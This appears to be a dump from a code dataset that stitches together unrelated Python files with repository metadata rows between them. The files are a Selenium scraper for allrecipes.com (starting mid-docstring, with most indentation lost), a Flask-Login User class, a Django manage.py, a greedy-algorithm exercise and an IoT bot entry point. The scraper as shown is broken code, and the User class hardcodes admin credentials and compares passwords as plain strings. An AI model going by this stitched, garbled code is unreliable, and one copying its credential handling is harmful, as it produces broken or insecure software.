True if the given url is a valid recipe url.
"""
return url.startswith('https://www.allrecipes.com/recipe')
def clean_url(url):
"""Clean the given url into the expected format of a recipe url. Invalid url will be marked as None.
Args:
url: Url to clean.
Returns:
Recipe url with the expected format (e.g., 'https://www.allrecipes.com/recipe/99970/chicken-cotija/').
Invalid url is returned as None instead.
"""
url = url.split('?')[0]
root_url = 'https://www.allrecipes.com'
if not url.startswith(root_url):
url = root_url + url
    if not is_valid_recipe_url(url):
return None
return url
def recipe_id_from_recipe_url(url):
"""Key function for sorting recipe urls. The sort will be done by the recipe id.
Args:
url: A recipe url (e.g., 'https://www.allrecipes.com/recipe/99970/chicken-cotija/')
Returns:
The key for list sort function, which is the recipe id found in the given url.
"""
return int(url.split('/')[4])
def recipe_cache_path(batch_id):
"""Recipe cache path with the given batch id.
Args:
batch_id: Batch ID assigned to the process which generated the recipe cache.
Returns:
Path for the recipe cache.
"""
return 'cache/recipe_scrape_{}_cache.csv'.format(batch_id)
def clean_url_list(urls, should_clean_url=False):
"""Clean the given list of urls: remove invalid urls, redundant urls, and sort them in lexicographic order.
Args:
urls: List of url
should_clean_url: If True, the function will iterate through every url and clean the url if necessary.
Returns:
Sorted list of unique recipe urls.
"""
if should_clean_url:
new_urls = []
for i in range(0,len(urls)):
url = clean_url(urls[i])
if url != None:
new_urls.append(url)
urls = new_urls
urls = list(set(urls))
urls.sort(key=recipe_id_from_recipe_url)
return urls
def category_name_from_category_root_url(category_root_url):
"""Category name from the given root URL of the category.
Args:
category_root_url: Root URL of the category.
Returns:
Category name.
"""
return category_root_url.rsplit("/",2)[1]
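# For example (illustrative URL, not scraped from the site):
# category_name_from_category_root_url('https://www.allrecipes.com/recipes/88/bbq-grilling/')
# returns 'bbq-grilling' -- rsplit("/", 2) keeps the path segment just before the trailing slash.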
def clean_text(text):
""" Replace all fractional non-ascii characters.
Args:
text: Text to clean.
Returns:
        Cleaned text with fractional unicode normalized, non-ascii characters removed, and unnecessary whitespace collapsed.
"""
for char in '¼½¾⅐⅑⅒⅓⅔⅕⅖⅗⅘⅙⅚⅛⅜⅝⅞↉':
normalized = unicodedata.normalize('NFKC',char)
        text = text.replace(char, normalized)  # str.replace returns a new string; the result must be kept
text = text.encode('ascii',errors='ignore').decode('utf-8') # Remove non-ascii characters.
text = re.sub('\s+',' ',text) # Replace repeated whitespaces with a single space.
text = text.strip() # Clean unnecessary leading or trailing whitespaces.
return text
def scrape_root_url(root_url):
"""Scrape the root url to get category root urls. The main carousel nav is the source of category root urls.
Args:
root_url: Root url of the site to scrape.
Returns:
A list of category urls.
"""
options = Options()
options.headless = True
driver = webdriver.Chrome('./chromedriver',options=options)
category_root_urls = []
try:
cache_path = 'cache/category_root_urls_cache.json'
if path.exists(cache_path):
with open(cache_path, 'r') as json_file:
category_root_urls = json.load(json_file)
else:
driver.get(root_url)
soup = BeautifulSoup(driver.execute_script('return document.body.innerHTML'),'html.parser')
for link_holder in soup.find_all(class_='carouselNav__link recipeCarousel__link'):
url = link_holder['href']
category_root_urls.append(url)
with open(cache_path, 'w') as json_file:
json.dump(category_root_urls, json_file)
finally:
driver.close()
driver.quit()
print('Number of category found: ', len(category_root_urls))
return category_root_urls
def scrape_single_category_root_url(category_root_url, driver):
"""Scrape the given category root url for a list of recipe urls.
Args:
category_root_url: Category root url to scrape.
driver: Selenium chrome driver used for scraping.
Returns:
A list of recipe urls scraped from the category root url.
"""
json_data = {}
category_name = category_name_from_category_root_url(category_root_url)
cache_path = 'cache/' + category_name + '_cache.json'
if path.exists(cache_path):
with open(cache_path, 'r') as json_file:
json_data = json.load(json_file)
else:
json_data = {
'category_name': category_name,
'category_url': category_root_url,
'last_page': 0,
'recipe_urls_length': 0,
'recipe_urls': [],
'timestamp': 0,
}
urls = clean_url_list(urls=json_data['recipe_urls'], should_clean_url=True)
print('Category: ', category_name, '. Number of recipe found: ', len(urls))
page_index = json_data['last_page']+1
while True:
page_url = category_root_url + '?page=' + str(page_index)
print('Looking at', page_url, '...')
driver.get(page_url)
time.sleep(0.25)
soup = BeautifulSoup(driver.execute_script('return document.body.innerHTML'),'html.parser')
is_new_recipe_found = False
for link_holder in [container.find(class_='card__titleLink') for container in soup.find_all(class_='card__detailsContainer')]:
url = clean_url(link_holder['href'])
if url != None:
urls.append(url)
is_new_recipe_found = True
for link_holder in [container.find(class_='tout__titleLink') for container in soup.find_all(class_='component tout')]:
url = clean_url(link_holder['href'])
if url != None:
urls.append(url)
is_new_recipe_found = True
for link_holder in [container.find(class_='fixed-recipe-card__title-link') for container in soup.find_all(class_='fixed-recipe-card')]:
url = clean_url(link_holder['href'])
if url != None:
urls.append(url)
is_new_recipe_found = True
if not is_new_recipe_found:
break
json_data['last_page'] = page_index
print('Category: ', category_name, '. Number of recipe found: ', len(urls))
# Save data per 100 page indices.
if page_index % 100 == 0:
            urls = clean_url_list(urls=urls)  # clean the in-progress list, not the stale cached one
json_data['recipe_urls'] = urls
json_data['recipe_urls_length'] = len(urls)
json_data['timestamp'] = time.time()
with open(cache_path, 'w') as json_file:
json.dump(json_data, json_file)
page_index += 1
    urls = clean_url_list(urls=urls)  # keep the urls appended since the last periodic save
json_data['recipe_urls'] = urls
json_data['recipe_urls_length'] = len(urls)
json_data['timestamp'] = time.time()
with open(cache_path, 'w') as json_file:
json.dump(json_data, json_file)
return json_data['recipe_urls']
def scrape_category_root_urls(category_root_urls):
"""Scrape the given list of root urls.
Args:
category_root_urls: List of category root urls to scrape.
Returns:
True if the scraping has been completed for all categories.
"""
options = Options()
options.headless = True
driver = webdriver.Chrome('./chromedriver',options=options)
try:
for category_root_url in category_root_urls:
scrape_single_category_root_url(category_root_url, driver)
finally:
driver.close()
driver.quit()
return True
def process_category_root_urls_in_parallel(category_root_urls, num_of_process=5):
"""Process the given list of root urls in parallel using a simple multiprocessing where each process is responsible for processing the same number of categories.
Args:
category_root_urls: List of category root url to scrape.
num_of_process: Number of process that invoked at the same time for multi-processing. Defaults to 5.
Returns:
True if all the processes have finished running.
"""
start_time = time.perf_counter()
categories_len = len(category_root_urls)
num_of_category_per_process = categories_len / num_of_process
processes = []
for i in range(num_of_process):
start_index = int(i * num_of_category_per_process)
end_index = int((i+1) * num_of_category_per_process)
process = multiprocessing.Process(target=scrape_category_root_urls, args=[category_root_urls[start_index:end_index]])
process.start()
processes.append(process)
for process in processes:
process.join()
finish_time = time.perf_counter()
print('Done scraping', categories_len, 'categories in ', round(finish_time-start_time, 2), 'second(s).')
return True
def coalesce_recipe_sources_from_category_cache(category_root_urls):
"""Combine all found urls from each category root urls.
Args:
category_root_urls: List of category root url that has been scraped.
Returns:
List of recipe urls in json format where key 'url' contains the url, and key 'categories' contains the category names associated with the url.
"""
recipe_source_dict = dict()
for category_root_url in category_root_urls:
category_name = category_name_from_category_root_url(category_root_url)
cache_path = 'cache/' + category_name + '_cache.json'
if path.exists(cache_path):
with open(cache_path, 'r') as json_file:
category_json_data = json.load(json_file)
for url in category_json_data['recipe_urls']:
if url in recipe_source_dict:
recipe_source_dict[url].append(category_json_data['category_name'])
else:
recipe_source_dict[url] = [category_json_data['category_name']]
combined_recipe_sources = []
for url, categories in recipe_source_dict.items():
combined_recipe_sources.append({
'url': url,
'categories': categories,
})
combined_recipe_sources_json = {
'recipe_sources_len': len(combined_recipe_sources),
'recipe_sources': combined_recipe_sources,
}
with open('cache/combined_recipe_urls_cache.json', 'w') as json_file:
json.dump(combined_recipe_sources_json, json_file)
return combined_recipe_sources
def scrape_single_recipe_url(recipe_url, recipe_category, driver):
"""Scrape recipe contents from a single recipe url.
Args:
recipe_url: URL of the recipe page to scrape.
recipe_category: List of categories associated with the recipe page.
driver: Selenium chrome driver used for scraping.
Returns:
        Recipe content packaged in a dictionary, keyed by the RECIPE_CSV_FIELDNAMES columns.
"""
driver.get(recipe_url)
time.sleep(0.05)
soup = BeautifulSoup(driver.execute_script('return document.body.innerHTML'),'html.parser')
# Recipe ID
recipe_id = recipe_id_from_recipe_url(recipe_url)
# Recipe Title
try:
recipe_title = clean_text(soup.find(class_='intro article-info').find(class_='headline heading-content').get_text())
except:
# When title scrape is failed, mark the recipe's title with an empty string
# TODO(mdp9): Find out why 'intro article-info' class is not found once in a while.
recipe_title = ''
# Recipe Summary
recipe_summary = clean_text(soup.find(class_='recipe-summary').get_text())
# Recipe Breadcrumbs
recipe_breadcrumbs = [clean_text(breadcrumb.get_text()) for breadcrumb in soup.find(class_='content-breadcrumbs').find_all(class_='breadcrumbs__title')]
# Recipe Rating
recipe_rating_average = 0
recipe_rating_count = 0
recipe_rating_detail = dict()
try:
for rating_item in soup.find(class_='recipe-ratings-list').find_all(class_='rating'):
rating_item_stars = int(rating_item.find(class_='rating-stars').find(text=True, recursive=False))
rating_item_count = int(rating_item.find(class_='rating-count').get_text())
recipe_rating_average += rating_item_stars * rating_item_count
recipe_rating_count += rating_item_count
recipe_rating_detail[rating_item_stars] = rating_item_count
except:
# When rating scrape is failed, mark the recipe's rating with -1.
# TODO(mdp9): Find out why 'recipe-ratings-list' class is not found once in a while.
recipe_rating_average = -1
if recipe_rating_count > 0:
recipe_rating_average /= recipe_rating_count
# Recipe Info
recipe_info = dict()
for info_item in soup.find(class_='recipe-info-section').find_all(class_='recipe-meta-item'):
info_header = clean_text(info_item.find(class_='recipe-meta-item-header').get_text()).split(':')[0].lower()
info_body = clean_text(info_item.find(class_='recipe-meta-item-body').get_text())
recipe_info[info_header] = info_body
# Recipe Ingredients
recipe_ingredients = ''
for ingredients_section in soup.find_all(class_='ingredients-section__fieldset'):
# Seperate each section with double new line.
if recipe_ingredients != '':
recipe_ingredients += '\n\n'
recipe_ingredients += '. '.join(clean_text(text=ingredients_section_legend.get_text()) for ingredients_section_legend in ingredients_section.find_all(class_='ingredients-section__legend')) + '\n'
recipe_ingredients += '. '.join(clean_text(text=ingredients_item.get_text()) for ingredients_item in ingredients_section.find_all(class_='ingredients-item'))
# Recipe Directions
recipe_directions = ''
for directions_section in soup.find_all(class_='instructions-section__fieldset'):
# Seperate each section with double new line.
if recipe_directions != '':
recipe_directions += '\n\n'
recipe_directions += '. '.join(clean_text(directions_item.get_text()) for directions_item in directions_section.find_all(class_='instructions-section-item'))
# Recipe Notes
recipe_notes = '. '.join(clean_text(notes.get_text()) for notes in soup.find_all(class_='component recipe-notes'))
# Recipe Nutrition
recipe_nutrition = '. '.join(clean_text(nutrition.get_text()) for nutrition in soup.find_all(class_='nutrition-section container'))
# Recipe Images
main_image_container = soup.find(class_='image-container').find(class_='lazy-image')
recipe_main_image = main_image_container['data-src'] if main_image_container != None else None
recipe_ugc_images = [ugc_photos_link.find('img')['src'] for ugc_photos_link in soup.find(class_='lead-content-wrapper').find_all(class_='ugc-photos-link')]
# Populate data
recipe_json = {
'id': recipe_id,
'url': recipe_url,
'title': recipe_title,
'summary': recipe_summary,
'category': recipe_category,
'breadcrumb': recipe_breadcrumbs,
'rating_average': recipe_rating_average,
'rating_count': recipe_rating_count,
'rating_detail': recipe_rating_detail,
'info': recipe_info,
'ingredients': recipe_ingredients,
'directions': recipe_directions,
'notes': recipe_notes,
'nutrition': recipe_nutrition,
'main_image': recipe_main_image,
'ugc_image': recipe_ugc_images,
}
return recipe_json
def scrape_recipe_sources(recipe_sources, batch_id):
"""Scrape the given list of recipe sources. The scraping is processed with a process assigned with the given batch ID.
Args:
recipe_sources: List of recipe sources. A source contains a 'url', the recipe URL, and 'categories', the categories associated with the recipe page.
batch_id: Batch ID assigned to the process where the scaping is conducted.
Returns:
True if the scraping has been completed for all recipe sources.
"""
options = Options()
options.headless = True
driver = webdriver.Chrome('./chromedriver',options=options)
cache_path = recipe_cache_path(batch_id)
scraped_ids = set()
if path.exists(cache_path):
        scraped_ids = set([row[0] for row in pandas.read_csv(cache_path, usecols=['id']).values])  # resume from this batch's own cache
else:
with open(cache_path, 'w') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
writer.writeheader()
try:
with open(cache_path, 'a') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
for i, recipe_source in enumerate(recipe_sources, start=1):
print('Batch {} processing recipe #{}'.format(batch_id, i))
recipe_id = recipe_id_from_recipe_url(recipe_source['url'])
if recipe_id in scraped_ids:
continue
                recipe_content = None
                # Sometimes the driver experiences a connection failure. Keep trying to scrape the page until it succeeds.
                while recipe_content is None:
                    try:
                        recipe_content = scrape_single_recipe_url(recipe_source['url'], recipe_source['categories'], driver)
                    except:
                        # Instantiate a new driver and retry; passing None to DictWriter.writerow would crash.
                        try:
                            driver.close()
                            driver.quit()
                        finally:
                            time.sleep(1)
                            driver = webdriver.Chrome('./chromedriver', options=options)
                writer.writerow(recipe_content)
finally:
driver.close()
driver.quit()
return True
def remove_scraped_recipe_from_list(recipe_sources):
"""Remove all the previously scraped recipe from the given recipe source list.
Args:
recipe_sources: List of recipe sources. A source contains a 'url', the recipe URL, and 'categories', the categories associated with the recipe page.
Returns:
Trimmed recipe sources which all member of the list has not been scraped yet.
"""
scraped_ids = set()
if path.exists(RESULT_CSV_PATH):
scraped_ids = set([row[0] for row in pandas.read_csv(RESULT_CSV_PATH, usecols=['id']).values])
new_recipe_sources = []
for recipe_source in recipe_sources:
recipe_id = recipe_id_from_recipe_url(recipe_source['url'])
if recipe_id in scraped_ids:
continue
new_recipe_sources.append(recipe_source)
print('Number of skipped recipes: {}. They are skipped because their info have been scraped before.'.format(len(recipe_sources)-len(new_recipe_sources)))
return new_recipe_sources
def process_recipe_sources_in_parallel(recipe_sources, num_of_process=5):
"""Process the given list of recipe sources in parallel using a simple multiprocessing where each process is responsible for processing the same number of categories.
Args:
recipe_sources: List of recipe sources. A source contains a 'url', the recipe URL, and 'categories', the categories associated with the recipe page.
num_of_process: Number of process that invoked at the same time for multi-processing. Defaults to 5.
Returns:
True if all the processes have finished running and after the csv caches have been combined into one csv.
"""
start_time = time.perf_counter()
recipe_sources = remove_scraped_recipe_from_list(recipe_sources)
recipe_sources_len = len(recipe_sources)
num_of_recipe_per_process = recipe_sources_len / num_of_process
processes = []
for i in range(num_of_process):
start_index = int(i * num_of_recipe_per_process)
end_index = int((i+1) * num_of_recipe_per_process)
process = multiprocessing.Process(target=scrape_recipe_sources, args=[recipe_sources[start_index:end_index],i])
process.start()
processes.append(process)
for process in processes:
process.join()
finish_time = time.perf_counter()
print('Done scraping', recipe_sources_len, 'recipes in ', round(finish_time-start_time, 2), 'second(s).')
coalesce_recipe_scrape_caches()
return True
def coalesce_recipe_scrape_caches():
"""Combine the previously scraped recipes that were put into separate caches into a single csv file.
Returns:
True if the recipe caches have successfully combined into one csv.
"""
if not path.exists(RESULT_CSV_PATH):
with open(RESULT_CSV_PATH, 'w') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
writer.writeheader()
# Coalesce recipe caches one by one.
batch_id = 0
while True:
cache_path = recipe_cache_path(batch_id)
if not path.exists(cache_path):
# Stops when the given cache path is not found. Cache IDs are not sparse.
break
print('Combining data from cached recipes batch {}...'.format(batch_id))
with open(RESULT_CSV_PATH, 'a') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
with open(cache_path) as cache_csv_file:
reader = csv.DictReader(cache_csv_file)
for row in reader:
writer.writerow(row)
# Remove old cache path
os.remove(cache_path)
batch_id += 1
# Sort the csv.
sorted_csv_data = None
with open(RESULT_CSV_PATH, 'r') as csv_file:
reader = csv.DictReader(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
next(reader, None) # Skip the header
sorted_csv_data = sorted(reader, key=lambda row:int(row['id']), reverse=False)
with open(RESULT_CSV_PATH, 'w') as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=RECIPE_CSV_FIELDNAMES)
writer.writeheader()
for row in sorted_csv_data:
writer.writerow(row)
return True
if __name__ == '__main__':
if not os.path.exists('chromedriver'):
sys.exit('ERROR: A chromedriver is not found at current directory.\nPlease download at https://chromedriver.chromium.org/downloads.')
if not os.path.exists('cache'):
os.makedirs('cache')
# Update recipe with remaining caches, just in case the program was interrupted previously.
coalesce_recipe_scrape_caches()
# Scrape scrape scrape!
root_url = 'https://www.allrecipes.com/recipes/'
category_root_urls = scrape_root_url(root_url)
process_category_root_urls_in_parallel(category_root_urls)
process_recipe_sources_in_parallel(coalesce_recipe_sources_from_category_cache(category_root_urls)) | [
"[email protected]"
] | |
5f07b6cf6ea1da6ba3a095aa6da467aca68957c8 | 768e37d05aa0b9c8f1a887301a7599603bea45ab | /User.py | a3f828a2c949753f27f3bc3b02011eeb36cd6c05 | [] | no_license | cj-zeiger/eConnect-backend | 4d65703d7b09806bb32fcde474f06e2c6fd7a25d | c2fb020681d8f6e643d8bff7683deda9fc96128d | refs/heads/master | 2021-01-21T02:41:05.551364 | 2015-08-21T17:59:11 | 2015-08-21T17:59:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from flask.ext.login import UserMixin
class User(UserMixin):
username='admin'
password='hashedpassword'
id=1
    def check_password(self, pwd):
        # Compare against this user's stored (hashed) password.
        return pwd == self.password
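# Typical flask-login wiring for this class (illustrative sketch; the
# login_manager instance is assumed to be created elsewhere in the app):
#
#   @login_manager.user_loader
#   def load_user(user_id):
#       return User() if int(user_id) == User.id else None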
| [
"[email protected]"
] | |
43c9e638366ac7d934c2a66c18c555501c60eac1 | 28ff818fcf120f52bde8d26dbaa654e951595009 | /APUNTES/PYTHON/EJEMPLOS_FORMACION/web04Django/portal_anuncios_informatica/manage.py | 14379d202cac129b8c4406d35bbb090c00685bf5 | [] | no_license | pcmaestro/my_repository | 9c87382b2c30e5d0985a08ddfa172995de80a45a | 13d47e67a49b5996654a5386c024e61c2c753e6b | refs/heads/master | 2022-07-13T20:38:14.614763 | 2020-08-14T18:58:44 | 2020-08-14T18:58:44 | 234,505,688 | 2 | 0 | null | 2022-06-21T03:58:12 | 2020-01-17T08:32:56 | Python | UTF-8 | Python | false | false | 647 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'portal_anuncios_informatica.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
6726af340507ef18cd6fecb526938ac266e2e837 | c553f9d608c435cd7f19c9be0ef512307295a837 | /daemin/greedy/실전문제/5.볼링공고르기.py | 25466ef2c70cb181a43b4110c060208edd5c5000 | [] | no_license | Green0v0/Algorithm | 2d089e7c016997c1fb5e1094ddeeb80cd1ce0485 | ab9b387e63550ef1b5dfe0f851163b16fbd42c88 | refs/heads/main | 2023-05-24T05:37:17.125671 | 2021-06-16T05:35:52 | 2021-06-16T05:35:52 | 330,944,982 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # n,m = map(int,input().split())
# k= list(map(int,input().split()))
# n,m= 8,5
# k = [1,5,4,3,2,4,5,2]
# import time
# start_time = time.time()
# n,m= 10,3
# data= [1,3,2,3,2,1,2,3,2,3,]
# count =0
"""
1. Used indices.
2. If k[i] != k[j], count the pair. (combinations // pick two balls of different weights! // balls with the same weight still count as distinct balls)
3. If k[i] == k[j], same weight, so pass.
* Looking at the example in the problem statement, I got the idea from the fact that a ball picked once is never picked again and we only move forward through the list.
"""
# for i in range(n):
# for j in range(i+1,n):
# if data[i] !=data[j]:
# count +=1
# else:
# pass
# print(count)
# end_time = time.time()
# print('Elapsed time:', end_time - start_time)
# Book solution  # couldn't understand the logic -- see the explanation below
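# How the book solution counts the pairs: array[i] holds how many balls weigh i.
# For each weight i in increasing order, first remove those balls from n, so n
# counts only the balls heavier than i; each of the array[i] balls of weight i
# then pairs with any of those n heavier balls. Every unordered pair of
# different weights is counted exactly once this way.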
n,m= 5,3
data= [1,3,2,3,2]
array=[0]*11
for i in data:
array[i]+=1
result = 0
for i in range(1, m+1):
n-=array[i]
result += array[i] * n
print(result)
| [
"[email protected]"
] | |
fa3936e9ab8112887d3ad4dbb99d32a2d66b2338 | 40ce4d7545309ca57f0670a3aa27573d43b18552 | /com.ppc.Bot/bot.py | d51d072f2e155cc8c00d88e1c91dc2c47e820314 | [
"Apache-2.0"
] | permissive | slrobertson1/botlab | 769dab97cca9ee291f3cccffe214544663d5178e | fef6005c57010a30ed8d1d599d15644dd7c870d8 | refs/heads/master | 2020-07-28T06:45:37.316094 | 2019-09-18T15:34:08 | 2019-09-18T15:34:08 | 209,341,818 | 0 | 0 | Apache-2.0 | 2019-09-18T15:23:37 | 2019-09-18T15:23:37 | null | UTF-8 | Python | false | false | 19,850 | py | '''
Created on March 27, 2017
This file is subject to the terms and conditions defined in the
file 'LICENSE.txt', which is part of this source code package.
@author: David Moss
'''
import json
import utilities
import domain
import localization
from controller import Controller
def run(botengine):
"""
Entry point for bot microservices
:param botengine: BotEngine environment object, our window to the outside world.
"""
localization.initialize(botengine)
#===========================================================================
# print("INPUTS: " + json.dumps(botengine.get_inputs(), indent=2, sort_keys=True))
#===========================================================================
trigger_type = botengine.get_trigger_type()
triggers = botengine.get_triggers()
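    # trigger_type is a bitmask, which is why every branch below tests it with
    # a bitwise AND against the botengine.TRIGGER_* constants.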
print("\n\n")
botengine.get_logger().info("TRIGGER : " + str(trigger_type))
# Grab our non-volatile memory
controller = load_controller(botengine)
# SCHEDULE TRIGGER
if trigger_type & botengine.TRIGGER_SCHEDULE != 0:
schedule_id = "DEFAULT"
if 'scheduleId' in botengine.get_inputs():
schedule_id = botengine.get_inputs()['scheduleId']
controller.run_intelligence_schedules(botengine, schedule_id)
# MODE TRIGGERS
elif trigger_type & botengine.TRIGGER_MODE != 0:
# Triggered off a change of location
botengine.get_logger().info("Trigger: Mode")
for trigger in triggers:
if 'location' in trigger:
mode = trigger['location']['event']
location_id = trigger['location']['locationId']
controller.sync_mode(botengine, mode, location_id)
# DEVICE ALERTS
elif trigger_type & botengine.TRIGGER_DEVICE_ALERT != 0:
# Triggered off a device alert
for trigger in triggers:
if 'device' in trigger:
device_id = trigger['device']['deviceId']
device_object = controller.get_device(device_id)
if device_object is not None:
device_location = trigger['device']['locationId']
updated_devices, updated_metadata = device_object.update(botengine)
for updated_device in updated_devices:
controller.sync_device(botengine, device_location, device_id, updated_device)
controller.device_measurements_updated(botengine, device_location, updated_device)
alerts = botengine.get_alerts_block()
for alert in alerts:
botengine.get_logger().info("Alert: " + json.dumps(alert, indent=2, sort_keys=True))
# Reformat to extract value
alert_params = {}
if 'params' in alert:
for p in alert['params']:
alert_params[p['name']] = p['value']
if alert is not None:
device_object.device_alert(botengine, alert['alertType'], alert_params)
controller.device_alert(botengine, device_location, device_object, alert['alertType'], alert_params)
# MEASUREMENT TRIGGERS
elif trigger_type & botengine.TRIGGER_DEVICE_MEASUREMENT != 0:
# Triggered off a device measurement
for trigger in triggers:
if 'device' in trigger:
device_id = trigger['device']['deviceId']
device_object = controller.get_device(device_id)
if device_object is not None:
device_location = trigger['device']['locationId']
updated_devices, updated_metadata = device_object.update(botengine)
for updated_device in updated_devices:
controller.sync_device(botengine, device_location, device_id, updated_device)
updated_device.device_measurements_updated(botengine)
# Ping any proxy devices to let any sub-microservices know that the proxy is still connected and delivering measurements
if updated_device.proxy_id is not None:
proxy_object = controller.get_device(updated_device.proxy_id)
if proxy_object is not None:
if proxy_object not in updated_devices:
proxy_object.device_measurements_updated(botengine)
controller.device_measurements_updated(botengine, device_location, updated_device)
# FILE UPLOAD TRIGGERS
elif trigger_type & botengine.TRIGGER_DEVICE_FILES != 0:
# Triggered off an uploaded file
file = botengine.get_file_block()
botengine.get_logger().info("File: " + json.dumps(file, indent=2, sort_keys=True))
if file is not None:
device_object = controller.get_device(file['deviceId'])
controller.file_uploaded(botengine, device_object, file)
# QUESTIONS ANSWERED
elif trigger_type & botengine.TRIGGER_QUESTION_ANSWER != 0:
question = botengine.get_answered_question()
botengine.get_logger().info("Answered: " + str(question.key_identifier))
botengine.get_logger().info("Answer = {}".format(question.answer))
controller.sync_question(botengine, question)
# DATA STREAM TRIGGERS
elif trigger_type & botengine.TRIGGER_DATA_STREAM != 0:
# Triggered off a data stream message
data_stream = botengine.get_datastream_block()
botengine.get_logger().info("Data Stream: " + json.dumps(data_stream, indent=2, sort_keys=True))
if 'address' not in data_stream:
botengine.get_logger().warn("Data stream message does not contain an 'address' field. Ignoring the message.")
else:
address = data_stream['address']
if 'feed' in data_stream:
content = data_stream['feed']
else:
content = None
if address != "schedule":
controller.sync_datastreams(botengine, address, content)
else:
controller.run_intelligence_schedules(botengine)
# GOAL / SCENARIO CHANGES
elif trigger_type & botengine.TRIGGER_METADATA != 0:
# The user changed the goal / scenario for a single sensor
for trigger in triggers:
botengine.get_logger().info("Changed device configuration")
if 'device' in trigger:
device_id = trigger['device']['deviceId']
device_object = controller.get_device(device_id)
if device_object is not None:
device_location = trigger['device']['locationId']
if 'spaces' in trigger['device']:
device_object.spaces = trigger['device']['spaces']
else:
device_object.spaces = []
updated_devices, updated_metadata = device_object.update(botengine)
for updated_device in updated_metadata:
controller.sync_device(botengine, device_location, device_id, updated_device)
updated_device.device_metadata_updated(botengine)
controller.device_metadata_updated(botengine, device_location, updated_device)
# LOCATION CONFIGURATION CHANGES
elif trigger_type & botengine.TRIGGER_LOCATION_CONFIGURATION != 0:
# The user changed location configuration settings, such as adding/removing/changing a user role in the location
botengine.get_logger().info("User changed roles")
category = None
previous_category = None
location_access = None
previous_location_access = None
user_id = None
location_id = botengine.get_location_id()
users = botengine.get_users_block()
for user in users:
botengine.get_logger().info("User: {}".format(user))
if 'category' in user:
category = user['category']
if 'prevCategory' in user:
previous_category = user['prevCategory']
if 'locationAccess' in user:
location_access = user['locationAccess']
if 'prevLocationAccess' in user:
previous_location_access = user['prevLocationAccess']
if 'userId' in user:
user_id = user['userId']
controller.user_role_updated(botengine, location_id, user_id, category, location_access, previous_category, previous_location_access)
# DATA REQUEST
elif trigger_type & botengine.TRIGGER_DATA_REQUEST != 0:
# Response to botengine.request_data()
botengine.get_logger().info("Data request received")
data = botengine.get_data_block()
events = {}
imported = False
import importlib
try:
import lz4.block
imported = True
except ImportError:
botengine.get_logger().error("Attempted to import 'lz4' to uncompress the data request response, but lz4 is not available. Please add 'lz4' to 'pip_install_remotely' in your structure.json.")
pass
if imported:
for d in data:
reference = None
if 'key' in d:
reference = d['key']
if reference not in events:
events[reference] = {}
botengine.get_logger().info("Downloading {} ({} bytes)...".format(d['deviceId'], d['compressedLength']))
r = botengine._requests.get(d['url'], timeout=60, stream=True)
events[reference][controller.get_device(d['deviceId'])] = lz4.block.decompress(r.content, uncompressed_size=d['dataLength'])
for reference in events:
controller.data_request_ready(botengine, reference, events[reference])
# DO NOT SAVE CORE VARIABLES HERE.
return
else:
botengine.get_logger().error("bot.py: Unknown trigger {}".format(trigger_type))
# Always save your variables!
botengine.save_variable("controller", controller, required_for_each_execution=True)
botengine.get_logger().info("<< bot")
def load_controller(botengine):
"""
Load the Controller object
:param botengine: Execution environment
"""
logger = botengine.get_logger()
try:
controller = botengine.load_variable("controller")
logger.info("Loaded the controller")
    except Exception:
controller = None
logger.info("Unable to load the controller")
    if controller is None:
botengine.get_logger().info("Bot : Creating a new Controller object. Hello.")
controller = Controller()
botengine.save_variable("controller", controller, required_for_each_execution=True)
import importlib
try:
analytics = importlib.import_module('analytics')
analytics.get_analytics(botengine).track(botengine, 'reset')
except ImportError:
pass
controller.track_new_and_deleted_devices(botengine)
controller.initialize(botengine)
return controller
#===============================================================================
# Location Intelligence Timers
#===============================================================================
def _location_intelligence_fired(botengine, argument_tuple):
"""
Entry point into this bot
Location intelligence timer or alarm fired
:param botengine: BotEngine Environment
:param argument_tuple: (intelligence_id, argument)
"""
botengine.get_logger().info("\n\nTRIGGER : _location_intelligence_fired()")
controller = load_controller(botengine)
controller.run_location_intelligence(botengine, argument_tuple[0], argument_tuple[1])
botengine.save_variable("controller", controller, required_for_each_execution=True)
botengine.get_logger().info("<< bot (location timer)")
def start_location_intelligence_timer(botengine, seconds, intelligence_id, argument, reference):
"""
Start a relative location intelligence timer
:param botengine: BotEngine environment
:param seconds: Seconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_location_intelligence_timer({}, {})".format(seconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_s(int(seconds), _location_intelligence_fired, (intelligence_id, argument), reference)
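# Usage sketch (illustrative only -- the intelligence module and reference
# string below are assumptions, not part of this file): fire timer_fired() in
# 60 seconds, replacing any earlier timer saved under the same reference.
#
#   start_location_intelligence_timer(botengine, 60, intelligence_id, {"reason": "recheck"}, "recheck_timer")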
def start_location_intelligence_timer_ms(botengine, milliseconds, intelligence_id, argument, reference):
"""
Start a relative location intelligence timer
:param botengine: BotEngine environment
:param milliseconds: Milliseconds from the start of the current execution to make this timer fire
:param intelligence_id: ID of the intelligence module to trigger when this timer fires
:param argument: Arbitrary argument to pass into the intelligence module's timer_fired() method when this timer fires
:param reference: Unique reference name that lets us later cancel this timer if needed
"""
botengine.get_logger().info(">start_location_intelligence_timer_ms({}, {})".format(milliseconds, reference))
if reference is not None and reference is not "":
botengine.cancel_timers(reference)
botengine.start_timer_ms(int(milliseconds), _location_intelligence_fired, (intelligence_id, argument), reference)
